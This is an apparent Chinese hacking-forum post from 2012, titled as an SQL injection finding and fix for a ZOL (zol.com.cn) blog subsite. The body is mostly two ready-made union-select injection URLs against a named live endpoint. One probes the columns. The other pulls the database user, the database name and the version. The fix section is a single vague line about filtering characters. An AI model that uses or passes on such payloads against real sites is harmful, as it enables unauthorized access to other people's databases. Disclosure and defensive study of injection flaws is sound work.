云美公社

云美公社»首页 › IT技术/使用交流 › 电脑病毒论坛 › 中关村在线博客子站SQL注入及修复方案

返回列表發新帖

查看: 62|回覆: 0

[漏洞分析] 中关村在线博客子站SQL注入及修复方案

从百草园干到三味书屋

3 主題	0 回帖	0 積分

金币: 0
閲讀權限: 220
精華: 0
威望: 0
贡献: 0
在線時間: 0 小時
註冊時間: 2009-11-26

發消息

發表於 2012-7-7 17:55:25 | 顯示全部樓層 |閲讀模式

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--

修复方案：
过滤参数提交非法字符或者拦截敏感字符等等。。。

回覆

使用道具舉報

返回列表發新帖

Archiver|手机版|小黑屋|云美公社 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等，请发 E-mail：qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部